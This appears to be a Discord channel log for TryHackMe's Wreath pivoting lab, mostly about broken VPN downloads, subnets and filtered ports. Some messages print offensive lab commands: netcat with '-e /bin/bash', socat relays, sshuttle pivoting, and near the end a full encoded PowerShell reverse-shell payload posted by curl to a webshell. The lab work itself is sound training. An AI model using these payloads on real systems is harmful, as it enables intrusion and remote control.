#wreath-network

You mean you cant join back? I didn't face this one, as soon as I left an rejoined the room. I was able to get my vpn file and then start the network

i mean if i leave the room, it still shows up in my rooms... its as if i never left

no option to join because i never left...and i dont get a vpn file

This should be resolved by the support team easily, I am not sure why they aren't addressing

they say they cant kick me out of the room

😶

did u join a different network ?

Yes, actually since the wreath was making the issue, I joined holo and started playing

i mean the subnet

10.200.101.200

is it still the same or different

I had a different subnet: 10.200.85.200

yeah i think thats the problem, that subnet must be bonkers, but i cant leave it

like a toxic ex

Lol

woah, I just started this network. I like it 👍

its pretty nice

ive done it twice

Gonna do the same. 2nd time blindly.

Hi guys
So when I upload the nc file to root @prod serv and I try run it it doesn’t work
It gives some sort of new line error
Last time I just used the nc file that someone else had uploaded and it worked fine but now the network has been reset and when I upload the file it doesn’t work
And I don’t know why
Can anyone help?

Verify the THM account there
Then share the screenshot of the issue you are facing

HI, can anyone help please?
https://tryhackme.com/r/room/wreath
Task 17
When trying to do nmap scan from .200 machine (prod-serv), all ports for .100 and .150 machines are filtered, however in room walkthrough it says that there should be open ports on .150 machine

You may need to reset the newtwork.

Did it twice during the weekend, didn't help.

It's on 10.201.17.x network, FYI

can confirm I just booted the network (hasn't been reset) and still having the same issue as qwe

mine is on a different subnet, interestingly

The command they provided on task 44 to get the NTML admin hash from Sam and system is not working error is something like object is not scriptable ( I have downloaded both file on my local machine and I am sure there is not syntax error or typo)

I'm intending to send another reset vote in 5m once the hourly cooldown ends, should make it 3/4

just tried again now that the network has reset, and the ports are still not working

How long ago did it restart?

41m ago

also for avoidance of doubt, in case I am doing something wrong here

oh I can't post images here I guess

You need to verify your account.

When you verify, you can send embedded images and gifs

oh yeah thanks, that worked

Try adding -Pn, I can't remember if that box is Windows or not.

have tried that as well as combinations including -sS, -sX -sF, and -sN

also have tried the entire range of ports, but I'm just testing 1-99 there as I know there's at least one port within that range, given the answer for the task contains ** as one of the ports in it

Hi there,

I can't have a reverse shell for the exploitation phase Task 6. I already did it few weeks ago but I tried today and i have this mistake :

I tried with the Attack box and with Exegol. I also tried with Metasploit (exploit(linux/http/webmin_backdoor)

Hi sir,

I tried it but I don't have a reverse shell.
@dull robin

just wanted to check if there is any further info regarding the issue I mentioned earlier? wondering if someone who has completed this room can confirm that it's not just me doing something incorrectly

@merry robin feel like donating some of your time?

I never really finished Wreath, I'll have to at some point.

I mean, there should definitely be ports open on 150, accessible to 200.
The most likely issue is people being dickheads.

Other possibilities include:

• Someone on staff has been messing with the base image and screwed it up. Unlikely, but wouldn't be the first time.
• The security groups have been changed and are now messed up. Again, very unlikely.
• The logic which controls the boxes isn't working properly. I haven't seen the code that does it, but from past experience that's not hugely unlikely.

The first two options would affect every subnet, so I suspect we'd be seeing more complaints than we are.

Try:

nmap -Pn -sT -vv -p 3389 10.201.123.150

The null and Christmas scans probably won't do much there, but that should give you a clear answer.

Tried this on 10.201.17.x subnet, 3389 is filtered

Just woke up so haven’t had a chance to test this but I definitely have run a scan with -sT and -Pn on the machine. What makes me think it wouldn’t be the first issue you mentioned (dickheads) is that it’s persisted across network resets, although I suppose someone could be doing the same thing multiple times. I’ve tried this immediately after a network reset though, when I wouldn’t think there’s enough time to close all of the ports on 150.

okay yeah I've run the command immediately after a network reset just now, at the first possible opportunity (as 200 took some time to become accessible)

Yeah, I have no idea what's going on there then. Something must have happened to either the security groups or the instance itself (cc @fair breach)

Hey, I'm currently on the first-nmap scanning inside the host, I've uploaded the static nmap binary, however, firstly it takes hours to run the scan on a single host, secondly, it doesn't output the open ports for me, any suggestions?

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 13:38 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.03% done
Stats: 0:01:47 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.10% done; ETC: 14:03 (0:23:20 remaining)

What command are you running

./nmap-dakiddo -T4 -p1-15000 10.201.135.150 -oN scan-full.txt

25 mins per scan, is a pretty long time, idk what wrong

Well you are scanning 15000 ports

Yeah thats the task, what I mean is even when the scan finished, I don't get the output of open ports for me

What kind of access do you have? SSH?

yup

That’s weird. It should output it, can you send a screenshot of what you see after you ran a scan

Verify yourself first so you can send screenshots

Hey guys I could really need some help, while inside the root@prod-serv, both IP's return me filtered ports

[root@prod-serv tmp]# ./nmap-dakiddo -p80 10.201.134.150

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 14:24 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-10-201-134-150.eu-west-1.compute.internal (10.201.134.150)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.20s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 02:32:93:AC:B3:5B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
[root@prod-serv tmp]# curl http://10.201.134.150
^C
[root@prod-serv tmp]# curl http://10.201.134.150:80
^C
[root@prod-serv tmp]# ./nmap-dakiddo -p80 10.201.134.100

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 14:25 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-10-201-134-100.eu-west-1.compute.internal (10.201.134.100)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.20s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 02:14:79:D0:ED:F3 (Unknown)

@stiff thorn this isn't just you, a couple of people have had the same issue (including myself)

see #wreath-network message conversation

I spent about a day and then just moved onto other rooms while I wait for it to be resolved

Next on the list.
@jabba.sh please escalate lmao
Network go brrrr

Tf

@cyan vine

There were go

Hm?

Network bricked?

no ports appear open on .100 or .150 from prod-serv

Guessing security groups if no one has messed with the boxes

But yes. TL;DR: needs debugged

Hello, did you run this from 10.201.123.200?

Looking into this now.

was afk sorry, yeah I did

I am trying to find out when the subnets for Wreath changed from 10.200.x.x to 10.201.x.x and if that is causing the issue.

Subnet is still 10.200.x.x for me.

Is it working for you when running nmap from 10.200.x.200 to 10.200.x.150?

Not getting any response currently

Back to drawing board I go. 😄

Gimme a sec.

I just realized I was using 201 subnet...

Aah, the subnet deception. 😉

from the prod-serv with the reverse shell included in the exploit. I got some open ports. Can't remember if that's all of them, but the scan is still running.

hope that helps.

Aah so from 10.200.52.200 it is working.

Thank you that is very useful. 🙏

Gave +1 Rep to @steel walrus (current: #118 - 60)

yup, seems like it, you are welcome. Glad I could be a little help.

Will have to check whether the security-group for .150 specifies allow inbound based on 10.200 even when in a 10.201 subnet.

Hey, still a problem here for me. IP address of prod-server 10.201.134.200, both 100 and 150 seems filtered, can't curl http on 150 also, any suggestion?

After reset ofcourse, still doesn't work

Hello, we're still investigating the cause of the issue with 10.201 subnets. Will provide an update when I know more. 🙏

./coder-nmap 10.201.17.150 -vv

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-18 14:18 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Initiating ARP Ping Scan at 14:18
Scanning 10.201.17.150 [1 port]
Completed ARP Ping Scan at 14:18, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:18
Completed Parallel DNS resolution of 1 host. at 14:18, 0.00s elapsed
Initiating SYN Stealth Scan at 14:18
Scanning ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150) [6150 ports]
SYN Stealth Scan Timing: About 23.75% done; ETC: 14:21 (0:01:40 remaining)
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 23.90% done; ETC: 14:21 (0:01:39 remaining)
SYN Stealth Scan Timing: About 48.06% done; ETC: 14:21 (0:01:06 remaining)
SYN Stealth Scan Timing: About 72.37% done; ETC: 14:21 (0:00:35 remaining)
Completed SYN Stealth Scan at 14:20, 124.32s elapsed (6150 total ports)
Nmap scan report for ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up, received arp-response (-0.20s latency).
All 6150 scanned ports on ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150) are filtered because of 6150 no-responses
MAC Address: 02:49:B0:CA:79:3F (Unknown)

Read data files from: /etc
Nmap done: 1 IP address (1 host up) scanned in 124.57 seconds
Raw packets sent: 12302 (541.256KB) | Rcvd: 1 (28B)

hope u fix it guys it has been like this for a days

Hello, can you please retry today on 10.201.17? 🙏

Can you please retry today on 10.201.123? 🙏

Can you please retry today on 10.201.134?

this seems to be working for me, haven't finished the scan yet but did see this output already

Discovered open port 3389/tcp on 10.201.123.150
Discovered open port 80/tcp on 10.201.123.150
Discovered open port 5985/tcp on 10.201.123.150

It works, thank you!

Gave +1 Rep to @blazing rock (current: #16 - 472)

Awesome! 😎

Gave 1 Rep to timtaylor1 (current: #16 - 473)

@blazing rock just want to confirm, should 150 be able to ping 200 and 100 from it?

I'm having difficulties establishing any sort of communication out from 150 back to 200, i.e. pings aren't working, and the powershell reverse shell command listed in the network task is stalling for 10s ish and then just dying, and socat -v isn't showing any data being transmitted

could very well be something I'm doing wrong but I figured I'd ask just because it seems like the sort of thing that might be related

context:

on prod-serv:

Same problem here (10.201.17.200)

As a workaround, you can run commands from the next task (21) via curl/burp. I managed to create a user and logged into .150 machine via evil-winrm

Hello, which task is this, and are you following the commands provided in the task?

Got stuck on Task 29 - generated stager doesn't work on .150 machine, I'm getting empty output after trying to run the stager via webshell (no agent being created)
Probably because of the same reason I and @plain zephyr had problems with Task 20. Connection cannot be established from .150 back to .200

I get an exception with the following error message when trying to run the stager via Evil-winRM:
Exception calling "DownloadData" with "1" argument(s): "Unable to connect to the remote server"

Task 20 for me, yeah. the task directs me to copy and paste the powershell command, substituting my IP on the VPN as well as the port (16969 in my case, which you can see is being forwarded via socat on prod-serv)

I also ran firewall-cmd --zone=public --add-port 16969/tcp so can confirm that was done

Is the network working for others? The Git server appears down and inaccessible for me.

for the record, I've tried resetting the network and redownloading the config file, nothing works.

.200 machine (git server) is accessible for me (10.201.17. subnet)

Did anyone make it through Task 29? It looks like there's still no connection from .150 to .200

10.201.149.150 still inaccessible

This should be fixed, you may need to reset the network.

It works, thanks!

Gave +1 Rep to @sharp ice (current: #1 - 2656)

Got the same problem again on 10.201.17. It worked for a while, but then suddenly stopped. Cannot connect to .200 machine from .150

Tried network reset, the problem persists

Also, it seems that .100 machine is down. Can't access .100 web page after successfully establishing connection via chisel and adding socks5 proxy via FoxyProxy

Unable to download wreath network config file ,
Upon downloading greeted with unknown error occurred msg

any help ?

Can someone please check if all ports on the wreath network are in ignored state please couse I don't think it's supposed to be like that.

Hello hello.

This is a network room, so all people will be split in to their own networks, so something that you have an issue with, somebody else might not..

It would be helpful if you supply the IP of the room so people can see if they're in your subnet or not.

ok

I'm not too sure where to find it

Is it the top of the three computers?

10.200.73.200

ok it works

pwd
/usr/libexec/webmin
cd ..

pwd
/usr/libexec/webmin
cd ..

pwd
/usr/libexec/webmin

Help I can't get out of this directory

Are you using the pseudo-shell in the exploit by any mischance?

Well I had to couse that's what made it work

The key word there is "pseudo". It's not an interactive shell -- just a wrapper around a HTTP endpoint which accepts shell commands and returns the output.
Things like changing the directory won't work because there's no persistence.

Hence why the next step is to get a real shell

Got one but the real one is the one with the problem, that's why I had to use the pseudo one

The real one won't change directory?

Yup

As in, one caught with netcat?

yup exactly that one

Well that's weird. Have you tried adding an SSH key and logging in that way?

Well I tried getting the shell differenty and that also worked

Feck.
Had my SSH connection going and everything but it shout down cause I forgot to click the Extend button in the last hour 😢
It's [allegedly] back up now, but nothing's responding 😡

Uptime is 34mins - anyone able to confirm things are responding? (can ping 10.50.55.1, nothing from 10.200.57.200)

i'm trying to install powershell empire when i run the command to start the server i get a python error

Traceback (most recent call last):
File "/usr/share/powershell-empire/empire.py", line 11, in <module>
import empire.server.server as server
File "/usr/share/powershell-empire/empire/server/server.py", line 14, in <module>
from empire.server.common import empire
File "/usr/share/powershell-empire/empire/server/common/empire.py", line 18, in <module>
from empire.server.core import hooks_internal
File "/usr/share/powershell-empire/empire/server/core/hooks_internal.py", line 5, in <module>
import jq as jq
ModuleNotFoundError: No module named 'jq'

any idea ? i tried installing the jq module using apt install python3-jq but no good

Hi everyone. I got a problem in Wreath
when i use sshuttle to set up an agent
The command
sshuttle -r root@10.200.105.200 --ssh-cmd "ssh -i id_rsa" 10.200.105.0/24
Response: [local sudo] Password:
but i can't brute it with hashcat
Does anyone knows the code

What are you trying to brute force here?

because it ask me password

i don't know why. i already have the id_rsa with root

It's asking for your password. not for id_rsa

Password for your user on your system, it needs root privileges to setup the shuttle

ohh it ask me the kali user password? i will try it . thanks too much

I also get a mistake sudo sshuttle -r root@10.200.105.200 --ssh-cmd "ssh -i id_rsa" 10.200.105.0/24
Connection closed by 10.200.105.200 port 22
c : fatal: failed to establish ssh session (2)

What's the reason for this?

Is the network up?
There should be a note or something for sshuttle in the room, -x flag maybe

the network is ok.

the -x flag i have already tried

the root id_rsa file i just copy it content then create a file in kali Then paste the content in and give 600permission

should i mv the orginal file into my kali by http

Are you able to login, ssh -i id_rsa root@...?

I tried that. It didn't work

Then something is wrong on the server. Maybe someone changed the SSH port or stopped it altogether, access the server the way you did to set up the id_rsa there. Gotta figure out on your own.

If it doesn't work, try voting for network reset at last.

Okay, I get it. Thank you

jq is not a python module 🙃

Why is curl request blocked but ping is permitted

From prod and pc I can ping my machine but I can’t curl

curl may not be installed.
||Are you actually using curl?|| 😉

I cannot download VPN configuration for Wreath as of today
If you can on your side, please help
More details with screenshots under #site-support : #site-support message
One other user @balmy dirge reported the same issue

Yep.

in r/access page, for machines , does the connection show connected for you ? it show not connected for me, even when vpn is connected

The connection status in the Access page is supposed to be broken: check this message from @sharp ice that has been pinned in #site-support :
#site-support message
So, you should not rely on the information you see there

Ah. Thanks for clarifying.

Gave +1 Rep to @cerulean prawn (current: #55 - 142)

About these issues affecting Wreath and Holo networks, I am helping another user in #room-help about the Active Directory network called "Lateral Movement and Pivoting"
And I have just realized that you can use the AttackBox without using the VPN configuration; up to recently, there was a bug whereby you had to use it
Have you tried Wreath using the AttackBox?
Well, forget about that: Wreath needs that VPN config file in all circumstances: see screenshot

leaving room , moves me to 10.200.71.x, joining takes me to 10.200.84.x. same for you ? There is no change of subnet happening for me.

leaving and joining does change the IP address for prod-serv on the network diagram for Wreath
I have just done it right now:

• from 10.200.101.200
• to 10.200.84.200
  which means leaving/joining moved me from subnet 10.200.101.0/24 to 10.200.84.0/24
  if I read your message correctly, leaving/joining moved you from subnet 10.200.71.x to 10.200.84.x
  BTW: still not possible to download VPN configuration though

Ah, got it.

BTW, one more report of Wreath not working: from my reply linked here, you can move to the original report:
#room-help message

p sure yes because i do get the curl help page and i get curl based errors unless ur implying that the curl installed on both machines is faulty

and also certutil doesnt work 😔

||there is an ssh.exe file tho so maybe i can try reverse tunneling but idk if it will just simply not work I also tried to execute a php rev shell and a powershell rev shell via the PoC on the personal PC||

IIRC I was able to use curl.
Are you on the first or the second machine?

both

technically its the third

ill try leaving the room and rejoining after a while

You'll need to make sure ports are forwarded (at each hop) - or that machine 2 has an open port (from M3, etc.)

yea i made sure they were open

have you retried again ? any luck ?

I had retried this morning, and once more now: same problem
this morning, I had retried after another user reported similar issue with another network, "CI/CD and Build Security" The details are here, and in subsequent messages:
#subs-room-help message
also, the "Holo" network has a problem similiar to Wreath This has been "officially" acknowledged by @blazing rock here:
#holo-network message

I cannot download the VPN configuration file for the Wreath network and I cannot regenerate it either
Symptoms: the download or regenerate buttons spin for 1 minutes, with no effect
no VPN file means no access to Wreath network for me
I have just created a support ticket for that
If you have the same issue, please consider creating a support ticket too, so that the issue gets the right visibility
NB: you create a support ticket by clicking on THM cloud bubble displayed at the bottom right of each THM web page

Assuming you've tried this? #wreath-network message

yes, multiple times, waiting minutes or hours after leaving before joining again
BTW: this is the exact same behaviour as for Holo network, which has been acknowledged by @blazing rock at the WE: #holo-network message

Gotcha, well hope it gets resolved soon

Let me try it now. It works for me on 10.201.134

Which subnet are you on? 10.200.x (where x is a number)

10.200.87.200
that is the one I have used in my support ticket, but of course each time I have left before joining again, I ended up on a different subnet

to be clear: I would not be surprised the network works, that is useful for all the users who have downloaded their VPN file some time ago
the problem is for me: I do not have that VPN file and cannot download it, so I am locked out of Wreath

I understand 🙏 , I successfully downloaded the ovpn file today, so I imagine something else is going on. Trying to figure out what is amiss. I am investigating with the team. 🙂

If you don't mind, can you please try leaving the room and rejoining, and try to get on a 10.201.x subnet? If you are successful in that, try to regenerate the ovpn file and download it.

I am starting that
the next network was 10.200.84.X, but I am stuck on it, probably because I am doing the leave/join too fast
I'll slow down
Here is the progress so far:

10.200.87.X: starting point
10.200.84.X: (multiple times: too fast)
10.200.85.X
10.200.87.X: again!
10.200.101.X
10.200.105.X: 500 error browsing Access page (see screenshot)
10.200.57.X
10.200.73.X

I'll do a couple more before I leave for the night Now is bedtime
I can carry on tomorrow: if you have a recommendation as to how much time to wait before to join (and to leave?), that would optimize the speed of the process
Thank you for your kind help

screenshot shows the error page when browsing to Access page while on 10.200.105.X

Let me try to get into a 10.200.x subnet and see what happens. Going to wait 10 minutes before rejoining.

I can't download the wreath openvpn file it says "An unknown error has occurred". I tried leaving the room and rejoining this didn't work too.

was just about to come and say the same thing. also tried to "generate" but tna

I suggest you open a support ticket, so that THM is aware of the scope of the issue
the more documentation of the problem, the better: screenshots, etc.
also, include the subnet (s) you had been assigned (10.200.<subnet>.X)

I suggest you open a support ticket, so that THM is aware of the scope of the issue
the more documentation of the problem, the better: screenshots, etc.
also, include the subnet (s) you had been assigned (10.200.<subnet>.X)

Sept 17: progress update results

MONDAY:
10.200.87.X: starting point
10.200.84.X: (multiple times: too fast)
10.200.85.X
10.200.87.X: again!
10.200.101.X
10.200.105.X: 500 error browsing Access page (see screenshot)
10.200.57.X
10.200.73.X
TUESDAY:
10.200.84.X    first of Tuesday
10.200.101.X    VPN DL OK
        ping 10.200.101.200: KO
        33 min up: voted 3/5 then 4/5 for reset
        no ping after 55 minutes up
        regen VPN: nothing better
10.200.85.X
10.200.87.X    again!
10.200.57.X    
10.200.96.X
10.200.43.X
10.200.87.X    again!
10.200.84.X    again!
10.200.105.X
10.200.57.X    again!
        VPN DL OK
10.200.84.X    again!
10.200.87.X    again!
10.200.101.X    again!
        500 error page for DL and regen
10.200.57.X    again!
        VPN DL/regen KO this time
10.200.84.X    again!
10.200.87.X    again!
10.200.101.X    again!

Methodology:

• wait min 10 minutes before joining after leaving
• wait min 5 minutes for network to be up before ping + nmap and VPN config download
  Conclusion so far:
• no 10.201.X subnet reached so far
• slow process
• I cycle too often through the same subnets
• I cannot see a pattern giving hope to escape from a 10.200.x to a 10.201.x subnet
• ~~ will try for the rest of the day~~
• will stop after today unless there is a better methodology
  I look forward to more guidance

What was the result for you?

Mine on 10.200.84 does not want to regenerate the config file, it results in a 504 error. Still investigating. 🙏 Thank you for your detailed attempts.

Gave +1 Rep to @cerulean prawn (current: #48 - 162)

hm.. even my attackbox dont have wreath.ovpn and i am a subscriber.

will ad this information to my ticket.

The interface for wreath on a sub is tun0

seems to be a bigger issue i am unable to reach wreath even from atkbox

I am unable to download VPN config file for Wreath network as well.

I get 10.200.87.200 network. I have tried regenerating the VPN config, and then download, but it just spins and displays "An unknown has error occurred" after few seconds.

Similar issue with Holo. IP assigned to DC-SRV01: 10.200.95.30

I have the same issue
You can read previous messages of this channel, in particular starting from this one: #wreath-network message

same issue too for me
follow messages for that network in #holo-network
in particular this message: #holo-network message

I'm havin the same problem now too. Worked fine a couple of days ago then switched networks due to 10 day limit. I get a 500 error when i try to regenerate a new vpn config. tried pinging with attack box and get no joy there either.

I cannot download the VPN file

is that the same case with everyone?

for me certainly: #wreath-network message

Is this just not even gonna be acknowledged, just paid 12 bucks for a non-functional room

Its been acknowledged by timtaylor, but no fix yet as far as I can see - you could email support and see what they say support@tryhackme.com

I contacted support yesterday, no response.

May take a few business days to get a response from them

Support is delayed.

this screen pop up when i tried to download wreath configuration file, Do I need to take action or just it is a temporary issue?

getting same errro message

i wasnt able to downlaod VPN since last week

contacted support and hasn't received response yet.

I think it is an intermittent problem, but it repeats itself as you cycle through different subnets for Wreath after you leave and join
I suspect however you will not be able to download the VPN config file for Wreath, and therefore will not be able to use that network
you can see here my attempts: #wreath-network message
if it fails for you, I suggest you create a support ticket with THM (check the THM cloud bubble icon on the bottom right of each THM web page) and that you document the issue including the subnet or subnets you have been asssigned while attempting
I think your ticket will add to the previous ones, like mine, and raise the visibility of the issue with THM
thank you

Gave +1 Rep to @digital girder (current: #2241 - 1)

when did you contact support for this?

last week

same for me

Anyone able to download wreath's vpn? I still see 500

Hello guys. I have intermittent network problems reaching wreath network boxes. It's getting worse since yesterday and it's not possible to work on it. When one box is available, the other is not reachable. I can see here I am not the only to complain. I am new to Try Hack Me so how can we get this solved?

Just for clarification I did succeed to download the openvpns config and connected to the network (more or less) but then machines are not accessible (through ssh for .200, through winrm for .150) etc.

this is what i got from the support team:

I see that you opened multiple tickets - I see that the problem was about wreath. Unfortunately that is a global issue and is present for all the users - our team is working on the fix but we are not sure how long it will take

And it's true, the team are looking in to it, as this not isolated to yourself.

yeah got that

I canceled my subscription, it makes no sense to pay where there is no service.

any updates ?

I saw this message earlier today from @abstract grove , who is THM staff:
#site-support message

Just peeping here, time to time, to check if its working 🙂

is this still unresolved?

it seemsis still not working

commenting so the channel does not dissappear from my discord interface

Your channels dissapear?

only non main ones, like if I search for a more niche room channel and I don't comment in it, it does not stick in suggested

Are you mobile or desktop?

desktop, but it applies to any "hidden" channel that normally does not appear unless you specifically navigate to it

Have you enabled this?

first, time I see it, now it unlocked a bunch more channels, cheers

anyone else able to interact with the network ? I get the VPN file and an internal IP, but the target does not respond to anything.....

yes for me: tried 3-4 hours ago and again now
I can ping 10.200.73.200
I guess you are not doing like me 15 minutes ago, i. e. trying to ping while the Network state said Stopped 🫢

`12: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.50.66.6/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::f58d:a217:afdb:b3db/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever

kali@kali:~/Downloads/Wreath [14-10-2024 15:26]$ ping 10.200.73.200
PING 10.200.73.200 (10.200.73.200) 56(84) bytes of data.
^C
--- 10.200.73.200 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1012ms

kali@kali:~/Downloads/Wreath [14-10-2024 15:26]$ `

can you share your tunnel ip interface ?

btw opened ticket 4 hours ago and no replies

and it's running as far as I can see

tun0: 10.50.66.7
I am using my local Kali VM

same, I have 10.50.66.6

🤔

as I was confused with ping going wrong (with the state Stopped), I regenerated my VPN
it was not necessary, of course
that may be another option for you?

okay, I restarted by VM again and now it works

now I will try to blitz through it one go to avoid troubleshooting it again

Ah wreath isnt working, i thought it was just me

Wreath working for me: check my instance on the screenshot
if is true there have been problems, but all good for me for 1 week

hello,,, anyone who knows a proxy that is free of charge please?

hello guys does the wreath room works ? i click on join room several times but it doesn't work , i wonder if it"s only me who have this problem ?

I reached out to support 2-3 weeks back.. they said they have been working on it. No resolution yet

I'm gonna check for few more days and cancel my subscription

There was a fix pushed out, which issue were you having?

The network doesnt start...

The network works if you restart it I think

Or sorry If you leave the room

But I'm gonna go ahead and reset it

I thought im the only one who experiencing this issue

wreath network still not working

It works now

I didnt do anything

¯_(ツ)_/¯

https://tenor.com/view/interesting-batman-very-interesting-thinking-gif-16421084

Its not working again :/

Networks as a feature appear to just be... broken... right now.
That's been the case for several months. Staff are aware.

Gotcha!

Hey, are you still experiencing issues?

I'm having an issue starting joining the wreath room. I click on "Join Room" and nothing happens

Also, I restarted the room's progress a couple of months ago, yet it's still showing my previous progress for some reason

I am gonna re-check again, and let you know. It didnt worked the last time. Also i was not able to connect to network for some reason.

its working @mellow sleet 🙂

cannot ping the first IP address given to test nettwork access. I am using attackthebox

"If you are a subscriber and are using the AttackBox then you will be able to find this connection pack in a directory on your desktop. This will be automatically connected when the AttackBox starts so don't run the connection pack manually on the AttackBox if you are a subscriber."

well clearly not

if it automatically connected

I would be able to ping the IP address in the diagram

@merry robin

I'm gonna be honest -- I have no idea what's going on with the THM network infrastructure.
It's not something I have any control over, and it seems to be broken for a lot of people. The network itself is fine, but the infrastructure which hosts it does not appear to be.
Raise a support ticket and see what they say

Its alright I just used my Kali VM instead, seems to work fine so far.

If they want to fix the attackthebox issue they can just view my comment above in this chat. Saves me having time to put in a ticket

network down again, this room is horrible

Hey, don't blame the room
The network is fine tyvm... as long as the hosting side of things works.

... Which it doesn't seem to be a lot of the time these days

Yep its not

the content is good though I will give it that

Question
I'm reading through the Reverse Shell Relay section under Pivoting: Socat in the Wreath room
I understand up to where we create the relay - the execution of ./socat tcp -l:8000... on the compromised server - socat is now listening on 8000 and relaying that connection back to Kali, right?
But I get confused on this bit:
From here we can then create a reverse shell to the newly opened port 8000 on the compromised server. This is demonstrated in the following screenshot, using netcat on the remote server to simulate receiving a reverse shell from the target server:

chmod +x ./nc-MuirlandOracle
./nc-MuirlandOracle 127.0.0.1 8000 -e /bin/bash

Where did the nc-<USERNAME> come from and what is the netcat listener doing on prod-serv in this scernario?

It's just to demonstrate that the relay works

If you were doing this "properly", netcat would be on a different server

Thought that was the case - thank you - the 'different server' would be on the target host (not the compromised server or the attack server)?

Gave +1 Rep to @merry robin (current: #10 - 804)

I acheived the Enumeration, Pivoting and Code Review sections for Wreath two days ago. But i couldn't spend time on it yesterday so i am picking it up again today.
I am reconnected to the VPN and can successfully ssh into prod-serv using the id_rsa key
However, i cannot sshuttle via git-serv today. I am using the following command (same as two days ago):

sshuttle -r root@10.200.101.200 --ssh-cmd "ssh -i id_rsa" 10.200.101.0/24 -x 10.200.101.200

But i get this error:

Traceback (most recent call last):
  File "/usr/local/bin/sshuttle", line 5, in <module>
    from sshuttle.cmdline import main
  File "/usr/local/lib/python2.7/dist-packages/sshuttle/cmdline.py", line 5, in <module>
    import sshuttle.client as client
  File "/usr/local/lib/python2.7/dist-packages/sshuttle/client.py", line 302
    assert(not re.search(rb'[^-\w\.]', hostname))
                                    ^
SyntaxError: invalid syntax

Why would I know be getting an error for sshuttle when it worked two days ago?

And if i run the python exploit
./43777.py
It hangs after
[+] Get user list

I'm gonna hazard a guess and say sshuttle is probably not meant to be using Python 2

Yeah, I'm seeing Python 3 in their code base. Reasonable chance you've screwed up your global python environment somewhere along the way.

Correct

👍

I now have everything working again and i have run the following commands:
TAB 1

┌──(kali㉿kali)-[~/Desktop/THM/Wreath/Pivoting]
└─$ ssh -i id_rsa root@10.200.101.200
[root@prod-serv ~]# firewall-cmd --zone=public --add-port 15151/tcp
success
[root@prod-serv ~]# curl <KA.LI.IP.ADD>/socat -o /tmp/socat-1of3 && chmod +x /tmp/socat-1of3
...
[root@prod-serv ~]# /tmp/./socat-1of3 tcp-l:15151 tcp:<KA.LI.IP.ADD>:443 &
[1] 2586
[root@prod-serv ~]# 

TAB 2

┌──(kali㉿kali)-[~/Desktop/THM/Wreath]
└─$ sshuttle -r root@10.200.101.200 --ssh-cmd "ssh -i Pivoting/id_rsa" 10.200.101.150 -x 10.200.101.200
[local sudo] Password: 
c : Connected to server.

TAB 3

┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$ sudo nc -nvlp 443                         
listening on [any] 443 ...

But my PowerShell Reverse Shell command hangs for about 10-20 seconds and then drops and nothing shows up in my nc listener tab...

TAB 4

┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$ curl -X POST -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.101.200%27%2C15151%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22" http://10.200.101.150/web/exploit-1of3.php
"" 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$ 

Have I missed something?

❗🥺 Could I get some help please? I have tried again today and sanity checked my approach but no luck. Thank you!

Any help would be appreciated - thank you 🙂

what is this help pls why i cant donwload the access ovpn

I had this problem too, I had to leave room and join room and try to download the ovpn file until I found a room that worked. Took about 4 times for me.

ok bro i'll try it thanks

I keep getting this same error. I tried leaving and rejoining the room as suggested above, but still keep receive the error message

getting same problem

not able to download the VPN config file for Wreath
getting 500 error .

please confirm you are a subscriber or that you have a 7-day streak

